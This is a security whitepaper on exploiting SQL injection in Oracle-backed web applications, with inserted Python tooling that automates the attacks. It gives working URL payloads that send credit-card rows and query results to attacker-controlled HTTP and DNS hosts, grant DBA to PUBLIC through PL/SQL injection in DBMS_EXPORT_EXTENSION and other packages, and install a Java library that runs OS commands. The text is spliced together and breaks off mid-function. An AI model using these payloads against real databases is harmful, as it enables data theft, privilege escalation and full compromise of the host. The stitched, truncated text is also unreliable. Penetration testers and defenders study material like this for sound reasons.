7Safe Limited

Hacking Oracle From The Web: Exploiting SQL Injection from Web Applications

Abstract:

This paper discusses the techniques available for exploiting SQL injection from web applications against the Oracle database. Most of the techniques available over the Internet assume that the attacker has interactive access to the Oracle database, i.e. that he can connect to the database via a SQL client. While some of these techniques can be applied directly when exploiting SQL injection in web applications, this is not always true. Unlike MS-SQL, Oracle neither supports stacked queries (several statements in one call) nor has any direct functionality like xp_cmdshell to allow execution of operating system commands. Extraction of sensitive data from a back-end database by exploiting SQL injection in Oracle web applications is well known. Performing privilege escalation and executing operating system commands from web applications is not widely known, and is the subject of this paper.

Table of Contents

SQL Injection 101
Exploiting SQL Injection
  1. Data Extraction
     1. Error Messages Enabled
        UTL_INADDR.GET_HOST_NAME
        CTXSYS.DRITHSX.SN
     2. Error Messages Disabled
        a) UNION Queries
        b) Blind Injection
        c) OOB Channels
           UTL_INADDR.GET_HOST_ADDRESS
           SYS.DBMS_LDAP.INIT
        d) Heavy Queries
  2. Privilege Escalation
     1. Privileged SQL Injection
        SYS.KUPP$PROC.CREATE_MASTER_PROCESS
        DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC
     2. Unprivileged SQL Injection
        DBMS_EXPORT_EXTENSION
  3. OS Code Execution
     1. DBMS_EXPORT_EXTENSION
        With Java
           1. Create Java Library
           2. Grant Java Permissions to SCOTT
           3. Create Function
           4. Grant Function Execute Privileges
           5. Execute OS Code
     2. With Java Privileges
        a) DBMS_JAVA.RUNJAVA
        b) DBMS_JAVA_TEST.FUNCALL
     3. With SYS Privileges
        DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC
        With Java
           Create Library
           Granting JAVA Permissions
           Creating Function
           Making Function Executable by PUBLIC
           Executing OS Code
     4. With DBA Privileges
        SYS.KUPP$PROC.CREATE_MASTER_PROCESS
        DBMS_SCHEDULER
           Create Program
           Create Job
           Remove Job (Not Required)
PL/SQL Injection
  Privilege Escalation
  OS Code Execution
References
About the author

SQL Injection 101

SQL injection is a vulnerability where unsanitised user input is used in SQL calls. This vulnerability allows an attacker to retrieve sensitive information from a back-end database. The impact of this vulnerability can vary from basic information disclosure to remote code execution and total compromise of the back-end systems.

E.g. let's look at the following pseudo PHP code:

$query = "select * from all_objects where object_name = '".$_GET['name']."'";

This query takes the user's input (the name parameter) and passes it directly into the query. Malicious input such as:

http://vulnsite.com/ora.php?name=' or '1'='1

will result in the following query being executed:

select * from all_objects where object_name = '' or '1'='1'

This changes the SQL logic and the query returns all rows from the table all_objects.
Exploiting SQL Injection

Exploiting SQL injection may mean different things to different people. Someone may only be after the sensitive data within the database (e.g. credit card details), while others may wish to execute operating system commands on the database host in order to compromise it completely. The remainder of this paper discusses these exploitation techniques.

1. Data Extraction

The following techniques are currently known to extract data from the back-end database by exploiting SQL injection from web applications:

1. Error Messages Enabled:

When database error messages are enabled, an attacker can return the output of an arbitrary SQL query within the database error message. A number of functions (executable by the PUBLIC role) can be used for this:

UTL_INADDR.GET_HOST_NAME

E.g. the following malicious input:

http://192.168.2.10/ora2.php?name=' and 1=utl_inaddr.get_host_name((select user from dual))--

will result in the following SQL query:

select * from all_objects where object_name = '' and 1=utl_inaddr.get_host_name((select user from dual))--'

This query will throw an error which contains the output of the query the attacker wanted to execute:

Warning: ociexecute() [function.ociexecute]: ORA-29257: host SCOTT unknown
ORA-06512: at "SYS.UTL_INADDR", line 4 ORA-06512: at "SYS.UTL_INADDR", line
35 ORA-06512: at line 1 in C:\wamp\www\ora2.php on line 13

While this technique works in Oracle 8, 9 and 10g, it fails in 11g. This is due to the enhanced security features in 11g, which implement network ACLs on packages that require network access, such as UTL_HTTP, UTL_INADDR etc.:

http://vulnsite.com/ora1.php?name=' and 1=utl_inaddr.get_host_name((select user from dual))--

Warning: ociexecute() [function.ociexecute]: ORA-24247: network access denied
by access control list (ACL) ORA-06512: at "SYS.UTL_INADDR", line 4 ORA-
06512: at "SYS.UTL_INADDR", line 35 ORA-06512: at line 1 in
C:\wamp\www\ora1.php on line 13

CTXSYS.DRITHSX.SN

Alexander Kornbrust showed that alternative functions can be used in 11g to extract the information in error messages:

ctxsys.drithsx.sn(1,(sql query to execute))

Example:

http://192.168.2.10/ora1.php?name=' and 1=ctxsys.drithsx.sn(1,(select user from dual))--

Warning: ociexecute() [function.ociexecute]: ORA-20000: Oracle Text error: DRG-11701: thesaurus
SCOTT does not exist ORA-06512: at "CTXSYS.DRUE", line 160 ORA-06512: at "CTXSYS.DRITHSX", line
538 ORA-06512: at line 1 in C:\wamp\www\ora1.php on line 13
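The two error formats above differ only in which PUBLIC-executable function raises them, so one extraction routine can serve 8i to 10g and 11g if it recognises the ACL denial and switches function. The following Python is an added example (not code from the paper or from 7Safe); the target is a constructed stand-in that answers with the error strings quoted above, and the `x` prefix and the `select user from dual` answer (SCOTT) are assumptions.

```python
import re


def inaddr_payload(prefix, query):
    """8i-10g: UTL_INADDR.GET_HOST_NAME raises ORA-29257 'host <value> unknown'."""
    return f"{prefix}' and 1=utl_inaddr.get_host_name(({query}))--"


def drithsx_payload(prefix, query):
    """11g: UTL_INADDR is fenced by the network ACL (ORA-24247);
    CTXSYS.DRITHSX.SN raises DRG-11701 'thesaurus <value> does not exist' instead."""
    return f"{prefix}' and 1=ctxsys.drithsx.sn(1,({query}))--"


LEAK_PATTERNS = [
    re.compile(r"ORA-29257: host (.+?) unknown"),
    re.compile(r"DRG-11701: thesaurus (.+?) does not exist"),
]
ACL_DENIED = re.compile(r"ORA-24247: network access denied")


def leaked_value(response):
    """Pull the query result back out of the error text; None if nothing leaked."""
    for pat in LEAK_PATTERNS:
        m = pat.search(response)
        if m:
            return m.group(1)
    return None


def extract_via_errors(send, prefix, query):
    """send(payload) returns the HTTP body.  Try UTL_INADDR first and fall back
    to the Oracle Text function only when the ACL denial shows the target is
    11g, so the common case costs a single request per value."""
    body = send(inaddr_payload(prefix, query))
    value = leaked_value(body)
    if value is None and ACL_DENIED.search(body):
        value = leaked_value(send(drithsx_payload(prefix, query)))
    return value


def fake_target(major_version, answers):
    """Constructed stand-in for ora1.php/ora2.php with error display on.
    `answers` maps a query to the value the real database would return."""
    inner = re.compile(r"\(\((.+?)\)\)|\(1,\((.+?)\)\)")

    def send(payload):
        m = inner.search(payload)
        value = answers[m.group(1) or m.group(2)]
        if "utl_inaddr" in payload:
            if major_version >= 11:
                return ('Warning: ociexecute() [function.ociexecute]: ORA-24247: network '
                        'access denied by access control list (ACL) ORA-06512: at '
                        '"SYS.UTL_INADDR", line 4')
            return (f'Warning: ociexecute() [function.ociexecute]: ORA-29257: host {value} '
                    'unknown ORA-06512: at "SYS.UTL_INADDR", line 4')
        return ('Warning: ociexecute() [function.ociexecute]: ORA-20000: Oracle Text error: '
                f'DRG-11701: thesaurus {value} does not exist ORA-06512: at "CTXSYS.DRUE", line 160')

    return send


if __name__ == "__main__":
    for version in (10, 11):
        send = fake_target(version, {"select user from dual": "SCOTT"})  # constructed answer
        print(version, extract_via_errors(send, "x", "select user from dual"))
```

Both functions take a VARCHAR2, so a numeric or date result is converted implicitly; a multi-row subquery raises ORA-01427 instead of leaking anything, which is why the routine returns None rather than guessing.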
2. Error Messages Disabled:

When database error messages are disabled there are a number of methods that can be used to extract data from the database:

a) UNION queries
b) Blind injection
c) Out-of-band channels
d) Heavy queries

These techniques are briefly discussed below, although a detailed analysis is not within the scope of this paper.

a) UNION Queries

This mostly applies when the SQL injection is within a SELECT statement and the output of the UNION query can be seen in the HTTP response, e.g.:

http://192.168.2.10/ora1.php?name=' union all select user from dual--

The limitation of this technique is that the query injected by the attacker must match the original query in the number of columns and their corresponding data types.
b) Blind Injection

Using this method the attacker does not directly see the output of the query he wants to execute. To enumerate the output, he needs to use a set of logical statements and observe the application's responses. For example:

http://192.168.2.10/ora2.php?name=TEST (produces a given page)
http://192.168.2.10/ora2.php?name=TEST' and (select user from dual)='SCOTT'-- (produces the same page)
http://192.168.2.10/ora2.php?name=TEST' and (select user from dual)='FOO'-- (produces a different page)

Based on the three responses above it can be deduced that the output of the query "select user from dual" is SCOTT.

Tools: There are a number of tools publicly available to exploit blind SQL injection in Oracle, e.g. sqlmap, bsqlbf, BSQL Hacker, Absinthe etc.
c) OOB Channels

Using this method, the information is sent to an attacker-controlled server over the network or the file system. There are a number of functions available under Oracle 8, 9 and 10g (R1 and R2) to achieve this.

UTL_INADDR.GET_HOST_ADDRESS

E.g. an attacker can make the database server issue a DNS resolution request for the host SCOTT.attacker.com by issuing a SQL query such as:

select utl_inaddr.get_host_address((select user from dual)||'.attacker.com') from dual;

http://192.168.2.10/ora2.php?name=SCOTT' and (select utl_inaddr.get_host_address((select user from dual)||'.hacker.notsosecure.com') from dual) is not null--

Thus, by receiving such DNS resolution requests, the attacker obtains the output of SQL queries:

18:55:27.985451 IP y.y.y.y.55152 > x.x.x.x.53: 52849 A? SCOTT.hacker.notsosecure.com. (46)

Similarly, an attacker can also make the database server issue other TCP requests (e.g. HTTP) and receive the output within these TCP requests issued to the attacker's server. Alexander Kornbrust showed a neat trick at Confidence 2009 on how, by issuing one such request, an attacker can get bulk data over OOB channels:

select sum(length(utl_http.request('http://attacker.com/'||ccnumber||'.'||fname||'.'||lname))) from creditcard

http://192.168.2.10/ora2.php?name=SCOTT' and (select sum(length(utl_http.request('http://attacker.com/'||ccnumber||'.'||fname||'.'||lname))) from creditcard)>0--

This single request makes the database server issue one HTTP request per row of the table: it sends all the card numbers (ccnumber) along with the corresponding first name (fname) and last name (lname) from the creditcard table to the attacker's site. These are the entries the attacker will find in his web server's access log:

...
x.x.x.x - - [17/Feb/2010:19:01:41 +0000] "GET /5612985025489216.test1.surname1 HTTP/1.1" 404 508 "-" "-"
x.x.x.x - - [17/Feb/2010:19:01:41 +0000] "GET /5612085027489216.test2.surname2 HTTP/1.1" 404 508 "-" "-"
x.x.x.x - - [17/Feb/2010:19:01:41 +0000] "GET /4612015028489214.test3.surname3 HTTP/1.1" 404 508 "-" "-"
...

The restriction of this technique is that outbound traffic from the database host must be allowed through the firewall. In practice, DNS is usually allowed and hence this technique is very useful.

SYS.DBMS_LDAP.INIT

As noted earlier, the enhanced security features introduced in 11g prohibit PUBLIC from executing packages which could cause a network connection. However, David Litchfield in his recent Black Hat talk showed another function (executable by PUBLIC) that can be used to conduct an OOB attack under 11g:

SELECT SYS.DBMS_LDAP.INIT((SELECT user from dual)||'.databasesecurity.com',80) FROM DUAL

http://192.168.2.10/ora1.php?name=SCOTT' and (SELECT SYS.DBMS_LDAP.INIT((SELECT user from dual)||'.databasesecurity.com',80) FROM DUAL) is not null--
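Both out-of-band primitives above (UTL_INADDR and DBMS_LDAP.INIT for DNS, UTL_HTTP for bulk HTTP) leave the data in the attacker's own logs, so the collecting side needs a payload builder and a log parser. The following Python is an added example, not tooling from the paper: the domain `hacker.notsosecure.com`, the URL `http://attacker.com/` and the log lines are constructed to match the formats shown in this section.

```python
import re
from urllib.parse import unquote

ATTACKER_DOMAIN = "hacker.notsosecure.com"   # assumed attacker-controlled zone


def dns_oob_payload(query, domain=ATTACKER_DOMAIN):
    """Pre-11g: UTL_INADDR is executable by PUBLIC; resolving the name leaks
    the query result as the left-most DNS label."""
    return f"(select utl_inaddr.get_host_address(({query})||'.{domain}') from dual) is not null"


def ldap_oob_payload(query, domain=ATTACKER_DOMAIN):
    """11g: UTL_INADDR sits behind the network ACL, but DBMS_LDAP.INIT is
    still PUBLIC and resolves the host before it tries to connect."""
    return f"(select sys.dbms_ldap.init(({query})||'.{domain}',80) from dual) is not null"


def http_bulk_payload(table, columns, url="http://attacker.com/"):
    """One HTTP request per row: SUM() over utl_http.request forces the
    function to run for every row of the table from a single injection."""
    path = "||'.'||".join(columns)
    return f"(select sum(length(utl_http.request('{url}'||{path}))) from {table})>0"


def labels_from_dns_log(lines, domain=ATTACKER_DOMAIN):
    """Leaked values from tcpdump-style 'A? <value>.<domain>.' query lines.
    A DNS label is at most 63 octets and resolvers may fold case, so long or
    case-sensitive data should be hex-encoded and chunked on the SQL side
    before this channel is used."""
    pat = re.compile(r"\bA\? (\S+?)\." + re.escape(domain) + r"\.?(?:\s|$)")
    found = []
    for line in lines:
        m = pat.search(line)
        if m:
            found.append(m.group(1))
    return found


def rows_from_access_log(lines, ncols):
    """Split each requested path back into the row's columns.  Only the first
    ncols-1 dots are separators, so a dotted last column survives intact."""
    get = re.compile(r'"GET /(\S+) HTTP/1\.[01]"')
    rows = []
    for line in lines:
        m = get.search(line)
        if m:
            parts = unquote(m.group(1)).split(".", ncols - 1)
            if len(parts) == ncols:
                rows.append(tuple(parts))
    return rows


# Constructed log lines in the formats shown above (not captures from the paper's lab).
DNS_LOG = [
    "18:55:27.985451 IP 10.0.0.5.55152 > 10.0.0.9.53: 52849 A? SCOTT.hacker.notsosecure.com. (46)",
    "18:55:28.101002 IP 10.0.0.5.55153 > 10.0.0.9.53: 52850 A? ntp.example.org. (33)",
]
ACCESS_LOG = [
    '10.0.0.5 - - [17/Feb/2010:19:01:41 +0000] "GET /5612985025489216.test1.surname1 HTTP/1.1" 404 508 "-" "-"',
    '10.0.0.5 - - [17/Feb/2010:19:01:41 +0000] "GET /4612015028489214.test3.van.dyke HTTP/1.1" 404 508 "-" "-"',
    '10.0.0.7 - - [17/Feb/2010:19:02:00 +0000] "GET /robots.txt HTTP/1.1" 404 508 "-" "-"',
]

if __name__ == "__main__":
    print(http_bulk_payload("creditcard", ["ccnumber", "fname", "lname"]))
    print(labels_from_dns_log(DNS_LOG))
    print(rows_from_access_log(ACCESS_LOG, 3))
```

The HTTP channel carries whole rows but needs outbound TCP/80 from the database host; the DNS channel only needs the host's resolver to forward queries, which is why it is the one that usually survives egress filtering.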
d) Heavy Queries

If the SQL injection is not within a SELECT statement (e.g. it is in an INSERT statement), then although the query injected by the attacker will be executed on the database server, it may not be possible to observe the output of the query, as the HTTP response returned by the application does not differ. Further, if the database host has egress filtering enabled then the OOB attack will not succeed. This method is perhaps the last resort available to extract the output of the SQL query.

For example, let's look at the following PHP code:

<?php
error_reporting(0);
$conn = oci_connect("scott", "tiger", '//192.168.2.11:1521/orcl');
$sql = "INSERT INTO DRAW VALUES ('".$_GET['number']."')";
$stmt = oci_parse($conn, $sql);
echo "Thank You For Your Submission";
oci_execute($stmt);
?>

The application performs an INSERT with the user-supplied input and displays the same message "Thank You For Your Submission" irrespective of whether the query executed successfully or not. This makes it impossible to observe the outcome of the logical statements issued by the attacker, and hence the blind injection technique described above fails here.

MS-SQL and MySQL have functions which can be called to make the database server sleep for a certain amount of time, so the outcome of the injected SQL query can be inferred from the time taken by the database/application server to respond. As there is no such function available to an unprivileged user in Oracle (DBMS_LOCK.SLEEP is not granted to PUBLIC by default), a similar approach is to make the database run a heavy query which results in a time delay. The end result is that the logical statements issued by the attacker can be classified as true or false depending on the time taken for the HTTP response.

http://192.168.2.10/ora11.php?number=2222222'||(select 1 from dual where (select count(*) from all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)>0 and (select user from dual)='SCOTT'))--

INSERT INTO DRAW VALUES('2222222'||(select 1 from dual where (select count(*) from all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)>0 and (select user from dual)='SCOTT'))--

Query lasts 30 seconds

http://192.168.2.10/ora11.php?number=2222222'||(select 1 from dual where (select count(*) from all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)>0 and (select user from dual)='XXXX'))--

INSERT INTO DRAW VALUES('2222222'||(select 1 from dual where (select count(*) from all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)>0 and (select user from dual)='XXXX'))--

Query lasts 1 second

The above two requests show that the output of the attacker's query is SCOTT.
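The blind (page-comparison) technique above and the heavy-query (timing) technique in the INSERT case differ only in how a true/false answer is read off the response; the character-by-character search is the same. The following Python is an added example, not the paper's code: it drives both through a constructed stand-in for ora2.php/ora11.php whose answer for `select user from dual` (SCOTT) and whose response times (30 s with the join, 1 s without, simulated rather than slept) are assumptions taken from the measurements quoted above.

```python
import re

HEAVY_JOIN = ("(select count(*) from all_users t1, all_users t2, all_users t3, "
              "all_users t4, all_users t5)>0")


def blind_payload(prefix, query, pos, threshold):
    """ora2.php style: the injected predicate changes which page comes back."""
    return f"{prefix}' and ascii(substr(({query}),{pos},1))>{threshold}--"


def heavy_payload(prefix, query, pos, threshold):
    """ora11.php style (INSERT context): the page never changes, so the
    predicate gates a cartesian self-join whose run time is the signal.  The
    cheap comparison is written first so Oracle can skip the join when it is
    false; evaluation order is not guaranteed, hence a measured baseline."""
    return (f"{prefix}'||(select 1 from dual where ascii(substr(({query}),{pos},1))>{threshold}"
            f" and {HEAVY_JOIN})--")


class FakeOracleApp:
    """Constructed target.  Answers the injected comparison exactly as the
    database would for the queries it knows; elapsed times are simulated
    (30 s when the join runs, 1 s when it does not), not slept."""
    _pat = re.compile(r"ascii\(substr\(\((.+?)\),(\d+),1\)\)>(\d+)")

    def __init__(self, answers):
        self.answers = answers
        self.requests = 0

    def request(self, payload):
        self.requests += 1
        m = self._pat.search(payload)
        if m is None:
            cond = True                               # unmodified request: normal page
        else:
            value = self.answers[m.group(1)]
            pos, threshold = int(m.group(2)), int(m.group(3))
            ch = value[pos - 1:pos]
            cond = bool(ch) and ord(ch) > threshold   # substr past the end is NULL: false
        if HEAVY_JOIN in payload:                     # INSERT form: constant page, variable time
            return "Thank You For Your Submission", (30.0 if cond else 1.0)
        return ("result page" if cond else "no results page"), 1.0


def boolean_oracle(app, baseline_body):
    """True when the response matches the page seen for the untouched request."""
    return lambda payload: app.request(payload)[0] == baseline_body


def timing_oracle(app, threshold_seconds):
    """True when the response took longer than the measured baseline."""
    return lambda payload: app.request(payload)[1] > threshold_seconds


def extract(oracle, build, prefix, query, max_len=30):
    """Recover the scalar result of `query` one character at a time, binary
    searching the ASCII value: 7 requests per character instead of up to 127."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:                      # invariant: ascii(ch) is in [lo, hi]
            mid = (lo + hi) // 2
            if oracle(build(prefix, query, pos, mid)):
                lo = mid + 1                # ascii > mid
            else:
                hi = mid                    # ascii <= mid (or NULL)
        if lo == 0:                         # NULL: ran past the end of the string
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    app = FakeOracleApp({"select user from dual": "SCOTT"})   # constructed answer
    same_page = app.request("TEST")[0]
    print(extract(boolean_oracle(app, same_page), blind_payload, "TEST", "select user from dual"))
    print(extract(timing_oracle(app, 10.0), heavy_payload, "2222222", "select user from dual"))
```

Against a real target the timing oracle needs the baseline measured several times and a threshold well inside the gap (here 10 s between 1 s and 30 s), because network jitter, not the database, is the usual source of false answers.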

2. Privilege Escalation

The above-mentioned techniques allow an attacker to obtain the output of an arbitrary SQL query. The important thing to understand here is the privileges with which the attacker's query gets executed. There are two broad categories:

1. Privileged SQL injection
2. Unprivileged SQL injection

1. Privileged SQL Injection:

By privileged SQL injection I mean that the attacker's query gets executed as the SYS user (or with DBA privileges) and thus he has access to the entire database. There are quite a few possibilities, such as:

1. The connection string has a privileged user.
2. The SQL injection is in a stored procedure which gets executed as SYS (or with DBA privileges).

Stored procedures in Oracle are executed with definer rights by default. Thus, if SYS owns a vulnerable procedure which SCOTT can execute, then SCOTT can execute SQL queries as SYS.

Example:

create or replace PROCEDURE
SYS.countpass(name IN VARCHAR2, message out varchar2)
AS
str varchar2(500);
BEGIN
str :='select count(PASSWORD) FROM SYS.USER$
WHERE NAME like ''%'||name||'%''';
Execute immediate str into message;
END;
/
Grant execute on SYS.countpass to SCOTT;

This procedure can be called from a web application. The following PHP code (ora6.php) demonstrates this:

<?php
$conn = oci_connect('SCOTT','TIGER') or die;

$sql = 'BEGIN SYS.countpass(:name, :message); END;';

$stmt = oci_parse($conn,$sql);

// Bind the input parameter
oci_bind_by_name($stmt,':name',$name,1000);

// Bind the output parameter
oci_bind_by_name($stmt,':message',$message,1000);

// Assign a value to the input
$name = $_GET['name'];

oci_execute($stmt);

// $message is now populated with the output value
print "$message";

?>

In this example, although the PHP uses bind variables, it does not help, as the procedure itself is still vulnerable (it concatenates the bound value into dynamic SQL). Further, although the application connects to the database as an unprivileged user (SCOTT), the injection point is in a procedure owned by SYS and therefore the attacker can execute SQL queries as SYS.
E.g.

http://192.168.2.10/ora6.php?name=SCOTT
Returns 1 <True page>

http://192.168.2.10/ora6.php?name=SCOTT' and (select password from sys.user$ where rownum=1)='286E1EA8F2CFD262'--
Returns 1 <True page>

http://192.168.2.10/ora6.php?name=SCOTT' and (select password from sys.user$ where rownum=1)='xxxxxxxxxxxx'--
Returns 0 <False page>

This implies that the attacker can run SQL as the SYS user (access the sys.user$ table), and the example demonstrates how an attacker can obtain the password hash of the SYS user using the blind injection technique described earlier.

What if the attacker wants to execute DDL/DML statements such as 'GRANT DBA TO PUBLIC'? The Oracle database poses a number of problems in executing DDL/DML statements when exploiting SQL injection from web applications, mainly because Oracle by design does not support stacked queries. In order to achieve this, we must find a function which either takes PL/SQL and executes it as a feature, or a function which is vulnerable to PL/SQL injection.

David Litchfield recently showed a few functions which could allow an attacker to achieve this:

SYS.KUPP$PROC.CREATE_MASTER_PROCESS

Affected Systems: 11g R1 and R2 (0 day)
Description: The execution of a PL/SQL statement within this function is a feature and not a bug. This function is not executable by PUBLIC; any user with the DBA role can execute it. As our injection point was in a procedure owned by SYS, we can execute this function.
http://192.168.2.10/ora6.php?name=SCOTT' and (Select SYS.KUPP$PROC.CREATE_MASTER_PROCESS('EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''GRANT DBA TO PUBLIC''''; END;'';') from dual) is not null--

DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC

Affected Systems: 8, 9, 10g R1, R2, 11g R1 (Fixed in CPU July 2009)
This function can only be executed by SYS. It uses definer rights (SYS) for execution. Unlike the previous function, this one executes PL/SQL due to a flaw (PL/SQL injection) and not a feature.

http://192.168.2.10/ora6.php?name=SCOTT' and (Select DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,'VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname); execute immediate ''declare pragma autonomous_transaction;begin execute immediate ''''grant dba to scott'''';end;''; end;--','CCCC') from dual) is not null--
2. Unprivileged SQL Injection

In the example described above, the injection point was in a procedure which gets executed as SYS and hence is privileged. But what if the SQL injection is not privileged, that is:

1. The injection is in a SQL statement which gets executed as an unprivileged user:

$conn = oci_connect("scott", "tiger", '//192.168.2.10:1521/orcl.com');
$query = "select text2 from foo2 where id = ".$_GET['name'];

2. The injection is in a procedure which gets executed as an unprivileged user (invoker rights):

CREATE OR REPLACE PROCEDURE
SCOTT.countobject(name IN VARCHAR2, message out varchar2) AUTHID CURRENT_USER AS
str varchar2(500);
BEGIN
str :='select count(object_name) from all_objects where object_name like ''%'||name||'%''';
execute immediate str into message;
END;
/

The following PHP script (ora7.php) now calls this procedure:

<?php
$conn = oci_connect('SCOTT','TIGER') or die;

$sql = 'BEGIN SCOTT.countobject(:name, :message); END;';

$stmt = oci_parse($conn,$sql);

// Bind the input parameter
oci_bind_by_name($stmt,':name',$name,1000);

// Bind the output parameter
oci_bind_by_name($stmt,':message',$message,1000);

// Assign a value to the input
$name = $_GET['name'];

oci_execute($stmt);

// $message is now populated with the output value
print "$message";
?>

Here the attacker's query will be executed as the SCOTT user. Let's see if we can still obtain the password hash of the SYS user:

http://192.168.2.10/ora7.php?name=SCOTT' and (select password from sys.user$ where rownum=1)='286E1EA8F2CFD262'--

This query now fails, as the injection is unprivileged and the user SCOTT does not have access to the sys.user$ table. If error messages are enabled on the application, the following error will be displayed:

Warning: oci_execute() [function.oci-execute]: ORA-00942: table or view
does not exist ORA-06512: at "SCOTT.countobject", line 8 ORA-06512: at line
1 in C:\wamp\www\ora7.php on line 18

This is where things start "getting interesting". Those of you familiar with MS-SQL may recall that MS-SQL has a feature called OPENROWSET which (if enabled) could allow an attacker to brute-force/guess the 'sa' password and then run SQL queries as 'sa'.

In Oracle a similar privilege escalation can be achieved under certain circumstances. At the time of writing this paper the following techniques are publicly known [1]:
DBMS_EXPORT_EXTENSION

Affected Versions: Oracle 8.1.7.4, 9.2.0.1 - 9.2.0.7, 10.1.0.2 - 10.1.0.4, 10.2.0.1 - 10.2.0.2, XE (Fixed in CPU July 2006)
Privilege required: none
Description: This package has had a number of functions vulnerable to PL/SQL injection. These functions are owned by SYS, execute as SYS and are executable by PUBLIC. Thus, if the SQL injection is in any of the unpatched Oracle database versions mentioned above, the attacker can call such a function and directly execute queries as SYS.

E.g.

http://192.168.2.10/ora7.php?name=SCOTT' and chr(44)=SYS.DBMS_EXP.ORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' grant dba to public'''';END;'';END;--','SYS',0,'1',0)--

[1] While an effort has been made to collect all publicly known techniques, it may be possible that other privilege escalation techniques are known.

This request results in the query 'GRANT DBA TO PUBLIC' being executed as SYS. This function allows PL/SQL because of a flaw (PL/SQL injection). Once this request has executed successfully, PUBLIC has the DBA role, thus escalating SCOTT's privileges, and our SCOTT user can now query the sys.user$ table:

http://192.168.2.10/ora7.php?name=SCOTT' and (select password from sys.user$ where rownum=1)='286E1EA8F2CFD262'--

Tool: bsqlbf has the feature of performing this privilege escalation first and then extracting data with DBA privileges. After extracting the data it revokes the DBA role from PUBLIC.

While there are no other publicly known techniques by which an attacker can become DBA from just the CREATE SESSION privilege by exploiting SQL injection from web applications, there are still a few attack vectors with which an attacker can execute operating system commands without having the DBA role (with JAVA privileges). This is discussed below.
3. OS Code Execution

The following attack vectors are currently publicly known for executing operating system commands against the Oracle database while exploiting SQL injection from web applications:

1. DBMS_EXPORT_EXTENSION

Affected Versions: Oracle 8.1.7.4, 9.2.0.1 - 9.2.0.7, 10.1.0.2 - 10.1.0.4, 10.2.0.1 - 10.2.0.2, XE
Privilege required: none
Description: As noted under privilege escalation, the functions within this package that are vulnerable to PL/SQL injection can be used to first gain DBA privileges; operating system commands can then be executed by a number of techniques, such as:

- Creating a JAVA library
- DBMS_SCHEDULER
- EXTPROC
- PL/SQL native make utility (9i only)

The following demonstrates how to do this with Java.
With Java:

1. Create Java Library:

http://192.168.2.10/ora7.php?name=SCOTT' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str %2b=stemp%2b"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str %2b=stemp%2b"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

(The Java source is sent URL-encoded: each + in the source is written as %2b, because the web server would otherwise decode a literal + in the query string as a space.)

2. Grant Java Permissions to SCOTT:

http://192.168.2.10/ora7.php?name=SCOTT' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

3. Create Function

http://192.168.2.10/ora7.php?name=SCOTT' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

4. Grant Function Execute Privileges

http://192.168.2.10/ora7.php?name=SCOTT' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

5. Execute OS Code

http://192.168.2.10/ora7.php?name=SCOTT' and (select sys.LinxRunCMD('cmd.exe /c whoami') from dual) is not null--

Similarly, one can execute OS code via this PL/SQL injection through other methods such as DBMS_SCHEDULER, the PL/SQL native make utility etc.

Tool: bsqlbf incorporates these methods of OS code execution.
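Every payload in this section and in the privilege-escalation section is the same three-level nesting (the function's string argument, the EXECUTE IMMEDIATE inside it, and the autonomous-transaction block's own EXECUTE IMMEDIATE), which is why the inner GRANT ends up with four quotes on each side and the arguments to dbms_java.grant_permission with eight. The following Python is an added example, not the paper's or bsqlbf's code: it generates those strings so the quoting can be checked offline before anything is sent, and the `FOO`/`BAR`/`CCCC` filler arguments are the ones used in the payloads above.

```python
from urllib.parse import quote


def pl_quote(s):
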